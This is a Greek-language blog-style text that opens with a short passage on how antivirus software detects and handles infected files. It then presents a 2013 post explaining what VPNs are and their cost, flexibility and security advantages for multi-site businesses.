Για την αντιμετώπιση των ιών αναπτύχθηκαν εφαρμογές «Αντιβίωσης» (antivirus). Οι εφαρμογές αυτές παρακολουθούν όλες τις διαδικασίες, που πραγματοποιούνται στο υπολογιστικό σύστημα, με στόχο να ανιχνεύσουν οποιαδήποτε ενέργεια μπορεί να γίνει από κάποιον ιό. Ο έλεγχός τους ξεκινά από τη μνήμη, τις εφαρμογές που εκτελούνται στον υπολογιστή, για να καταλήξει στην πραγματοποίηση ελέγχου στα δεδομένα που μετακινούνται από και προς το υπολογιστικό σύστημα.
Η λειτουργία των προγραμμάτων antivirus μπορεί να περιγραφεί ως εξής : ανιχνεύουν τον ιό και δίνουν στο χρήστη μια σειρά από δυνατότητες: να καθαρίσει τα "μολυσμένα" αρχεία, να τα σβήσει, ή να τα θέσει σε καραντίνα. Ελέγχουν κάθε νέο αρχείο που προσπαθεί ο χρήστης να περάσει στον υπολογιστή του (από δισκέτα, CDROM, e- mail, τοπικό δίκτυο κλπ) και ακόμα προσφέρουν τη δυνατότητα ενημέρωσής τους (Update) μέσω του Διαδικτύου, ώστε έτσι να αναβαθμιστούν και να αντιμετωπίζουν τους νέους ιούς που εμφανίζονται.

Τρίτη 22 Ιανουαρίου 2013

Τι είναι τα Ιδεατά Ιδιωτικά Δίκτυα (VPN)

Επιχειρήσεις με περισσότερα από ένα σημεία παρουσίας (καταστήματα, γραφεία) πολύ συχνά αντιμετωπίζουν προβλήματα επικοινωνίας ή λειτουργίας που απορρέουν από τη γεωγραφική απόσταση που χωρίζει αυτά τα σημεία. Σε αυτές ακριβώς τις επιχειρήσεις απευθύνεται ένα Ιδεατό Ιδιωτικό Δίκτυο (Virtual Private Network, VPN), το οποίο μπορεί να προσφέρει λύσεις σε θέματα επικοινωνίας, οργάνωσης, διαχείρισης και κατανομής πληροφοριών σε όλα τα τμήματα ή τα υποκαταστήματα μιας επιχείρησης, όπου κι αν βρίσκονται, και κυρίως με συγκεκριμένες εγγυήσεις.

Επικοινωνία

Ένα δίκτυο VPN έχει ως βασικό σκοπό να εξασφαλίσει την επικοινωνία κάθε απομακρυσμένου γραφείου/καταστήματος, ή ακόμα και με κάθε στέλεχος της εταιρίας που βρίσκεται εκτός γραφείου, με τα κεντρικά γραφεία της επιχείρησης ή οποιοδήποτε άλλο σημείο ανήκει στο εν λόγω δίκτυο (επικοινωνία any-to-any). Η επικοινωνία αυτή συνήθως αφορά στη λειτουργία επιχειρηματικών εφαρμογών, τη μεταφορά αρχείων, την τηλεφωνική επικοινωνία μεταξύ των σημείων, την πρόσβαση στο Διαδίκτυο και στο ηλεκτρονικό ταχυδρομείο αλλά και σε οποιαδήποτε άλλη ανάγκη επιθυμεί να καλύψει η επιχείρηση. Η συνηθέστερη περιγραφή ενός Ιδεατού Ιδιωτικού Δικτύου είναι αυτή μιας υποδομής που επιτρέπει τη σύνδεση δύο ή περισσότερων ιδιωτικών δικτύων με το Internet μέσα από ένα ασφαλές κανάλι. Στην πραγματικότητα, τα VPN προσφέρουν πρόσβαση στο Internet και επικοινωνία ανάμεσα σε γραφεία/καταστήματα μιας επιχείρησης που βρίσκονται σε διαφορετικές γεωγραφικές τοποθεσίες χρησιμοποιώντας το ήδη υπάρχον δημόσιο δίκτυο και όχι ακριβές μισθωμένες γραμμές. Την ίδια στιγμή, τα Ιδεατά Ιδιωτικά Δίκτυα παρέχουν τον ίδιο βαθμό ασφαλείας με τα ιδιωτικά δίκτυα, ενώ εκμεταλλεύονται αποτελεσματικά τις οικονομίες κλίμακος που δημιουργούνται.

Ανταλλαγή πληροφοριών

Το VPN αποτελεί επίσης ιδιαίτερα αποτελεσματικό τρόπο ανταλλαγής σημαντικών πληροφοριών και δεδομένων ανάμεσα σε υπαλλήλους που βρίσκονται σε διαφορετικές τοποθεσίες, όπως γραφεία και καταστήματα της επιχείρησης, σε πελάτες, προμηθευτές και γενικότερα εκτός γραφείου. Καθώς οι επιχειρήσεις δεν είναι πλέον αναγκασμένες να επενδύσουν στην απαραίτητη υποδομή, μπορούν να μειώσουν ακόμη περισσότερο το λειτουργικό τους κόστος με το να αναθέτουν τις υπηρεσίες δικτύου σε παρόχους τέτοιων υπηρεσιών (ψηφιακό outsourcing).
Εξάλλου, τα VPN μειώνουν ακόμη περισσότερο τα κόστη της επιχείρησης, καθώς εξαλείφουν την ανάγκη για υπεραστικά τηλεφωνήματα είτε για σύνδεση στο Διαδίκτυο, είτε για επικοινωνία ανάμεσα σε διαφορετικά γραφεία της επιχείρησης, καθώς η σύνδεση (κλήση) πραγματοποιείται με τον πλησιέστερο κόμβο του παρόχου.

Δομή και Ασφάλεια

Τα Ιδεατά Ιδιωτικά Δίκτυα δομούνται σήμερα με διάφορους τρόπους. Ο δημοφιλέστερος τρόπος είναι η χρήση τεχνολογιών ΙP, οι οποίες προσφέρουν περισσότερες δυνατότητες αλλά και ευελιξία. Επίσης οι IP δίνουν τη δυνατότητα παροχής πληθώρας υπηρεσιών προστιθέμενης αξίας στην επιχείρηση. Η ασφάλεια και η προστασία των δεδομένων είναι παράγοντας πρωταρχικής σημασίας όταν γίνεται ανάπτυξη υπηρεσιών μέσω Διαδικτύου, γεγονός που τις καθιστά ευάλωτες σεεπιθέσεις και πρόσβαση από ανεπιθύμητα μέρη. Τα ασφαλή IP-VPN δίκτυα προσφέρουν υψηλότατο βαθμό ασφαλείας από τέτοιες απειλές. Μολονότι οι ρυθμίσεις ασφαλείας διαφέρουν από λύση σε λύση, οι περισσότεροι πάροχοι Ιδεατών Ιδιωτικών Δικτύων με τη χρήση IP, προσφέρουν κρυπτογράφηση δεδομένων (data encryption), firewall, προστασία από ανεπιθύμητη ηλεκτρονική αλληλογραφία (spamming) κ.ά.
Τα Ιδεατά Ιδιωτικά Δίκτυα χωρίζονται σε τρεις γενικές κατηγορίες: αυτά που βασίζονται στον εξοπλισμό, αυτά που βασίζονται στα firewall και όσα χρησιμοποιούν ανεξάρτητες εφαρμογές. Απλούστερα είναι τα VPN που βασίζονται στον εξοπλισμό, ωστόσο συχνά δεν είναι τόσο ευέλικτα όσο τα VPN που χρησιμοποιούν λογισμικό. Ασφαλέστερα όλων θεωρούνται τα δίκτυα που βασίζονται σε firewall. Ωστόσο, αν γίνει υπερ-φόρτωση του firewall, ενδέχεται να προκύψουν ζητήματα απόδοσης.
Ωστόσο, καθώς η αγορά των Ιδεατών Ιδιωτικών Δικτύων ωριμάζει και εξελίσσεται ταχύτατα, όλο και συχνότερα τα διαφορετικά μοντέλα δόμησης VPN δανείζονται το ένα χαρακτηριστικά από το άλλο. Έτσι, πολλοί πάροχοι παρέχουν δίκτυα που συνδυάζουν εξοπλισμό, λογισμικό αλλά και τα πολύ υψηλά επίπεδα ασφαλείας που προσφέρουν τα firewall.
Επιπλέον, εταιρίες που παρέχουν VPN προσφέρουν όλο και συχνότερα -εκτός από τη δόμηση του δικτύου- και επιπλέον υπηρεσίες προστιθέμενης αξίας στην επιχείρηση, όπως συμβουλευτικές υπηρεσίες, σχεδιασμό, υποστήριξη, εργαλεία ηλεκτρονικού εμπορίου αλλά και το τελευταίο διάστημα τηλεφωνία μέσω Διαδικτύου. Η λεγόμενη VoIP (Voice over IP) τηλεφωνία έχει γίνει τόσο δημοφιλής για τις εξαιρετικά χαμηλές χρεώσεις που παρέχει, ώστε πρόσφατα στη Βρετανία τα VoIP τηλέφωνα απέκτησαν δικό τους πρόθεμα.

Πλεονεκτήματα των Ιδεατών Ιδιωτικών Δικτύων

Τα Ιδεατά Ιδιωτικά Δίκτυα τον τελευταίο καιρό έχουν λάβει σημαντική δημοσιότητα, όπως και άλλες τεχνολογίες δικτύου. Ωστόσο, τα VPN παρέχουν περισσότερα πλεονεκτήματα σε σχέση με τις "παραδοσιακές" τεχνολογίες διασύνδεσης, γεγονός που τα έχει καταστήσει ιδιαίτερα δημοφιλή. Όπως είδαμε ήδη, το βασικό τους χαρακτηριστικό είναι ότι επιτρέπουν τη χρήση του Internet για την επικοινωνία ανάμεσα στα γραφεία/καταστήματα μιας επιχείρησης που βρίσκονται σε διαφορετικές γεωγραφικές τοποθεσίες. Όπως θα δούμε παρακάτω, αυτό προσφέρει σημαντικά πλεονεκτήματα, καθώς στην πραγματικότητα χρησιμοποιείται μια ενιαία υποδομή για να πραγματοποιηθούν δύο λειτουργίες: σύνδεση στο Διαδίκτυο και εσωτερική επικοινωνία.
 
Τρία είναι τα βασικά πλεονεκτήματα των VPN: η εξοικονόμηση κόστους, η ευελιξία που παρέχουν, καθώς προσαρμόζονται εύκολα στις ανάγκες επιχειρήσεων διαφορετικών μεγεθών και απαιτήσεων, και η ασφάλεια.
  • Εξοικονόμηση κόστους

Η εξοικονόμηση κόστους προκύπτει καθώς τα Ιδεατά Ιδιωτικά Δίκτυα εξαλείφουν την ανάγκη για ακριβές μισθωμένες γραμμές. Με ένα VPN, η επιχείρηση χρειάζεται μια τοπική μισθωμένη γραμμή (με πολύ χαμηλότερο κόστος) ή ακόμα και μια ευρυζωνική σύνδεση.Με αυτό τον τρόπο η επιχείρηση αποκτά σύνδεση στο Internet, την οποία παράλληλα χρησιμοποιεί για την επικοινωνία ανάμεσα στα γραφεία ή καταστήματά της που βρίσκονται σε διαφορετικά σημεία. Όπως είναι κατανοητό, με αυτό τον τρόπο μειώνονται σημαντικά τα τηλεπικοινωνιακά κόστη, καθώς δεν απαιτείται ακριβή υποδομή και από την άλλη εξαλείφονται οι υπεραστικές κλήσεις. Το κόστος μιας επιχείρησης που θα επιλέξει την "παραδοσιακή" λύση της μισθωμένης γραμμής μπορεί στην αρχή να μη φαντάζει πολύ υψηλό, αλλά σχεδόν πάντοτε αυξάνεται στην πορεία, σχεδόν γεωμετρικά. Για παράδειγμα, μια μικρή επιχείρηση με δύο καταστήματα αγοράζει μια μισθωμένη γραμμή για να τα συνδέσει. Αν όμως ανοίξει και τρίτο κατάστημα, θα χρειαστεί δύο επιπλέον μισθωμένες γραμμές. Έτσι, 4 καταστήματα χρειάζονται 6 γραμμές, 5 καταστήματα χρειάζονται
10 κ.ο.κ.
  • Ευελιξία

Σε ό,τι αφορά την ευελιξία που παρέχουν τα Ιδεατά Ιδιωτικά Δίκτυα, εκτός από το γεγονός ότι προσαρμόζονται εύκολα στις ανάγκες των επιχειρήσεων, όπως η πλειονότητα των υπηρεσιών δικτύου, δεν απαιτούν την υπογραφή μακροχρόνιου συμβολαίου της επιχείρησης με τον πάροχο. Είναι εύκολο για μια εταιρία να αλλάξει πάροχο, αν αυτό τη συμφέρει οικονομικά. Επιπλέον, ένα VPN απαιτεί πολύ μικρότερο χρόνο στη "στήσιμo" του από την εγκατάσταση μιας μισθωμένης γραμμής. Για τομείς της οικονομίας όπως οι Ασφάλειες ή οι Κατασκευές, η εξοικονόμηση χρόνου αποτελεί κρίσιμο παράγοντα.
  • Ασφάλεια

Όπως αναφέρθηκε και παραπάνω, ένα από τα βασικότερα πλεονεκτήματα των VPN και μία από τις αιτίες της ραγδαίας ανάπτυξής τους είναι ο πολύ υψηλός βαθμός ασφάλειας που παρέχουν. Τα δεδομένα που διακινούνται μέσω των VPN είναι εμπιστευτικά, και απαιτείται πιστοποίηση με κωδικούς για την πρόσβαση σε αυτά. Συχνά εταιρίες επιλέγουν να αναπτύσσουν extranets πάνω σε Ιδεατά Ιδιωτικά Δίκτυα, προκειμένου να δώσουν συγκεκριμένα δικαιώματα πρόσβασης σε πελάτες, συνεργάτες και εμπορικούς εταίρους. Επίσης, η λύση αυτή επιτρέπει και τον έλεγχο της πρόσβασης, με διαφορετικά δικαιώματα για διαφορετικές ομάδες εργαζομένων. Αυτή η μέθοδος είναι πολύ πιο απλή και οικονομική από "παραδοσιακές" μεθόδους που εφαρμόζουν σήμερα διευθυντές τεχνολογίας.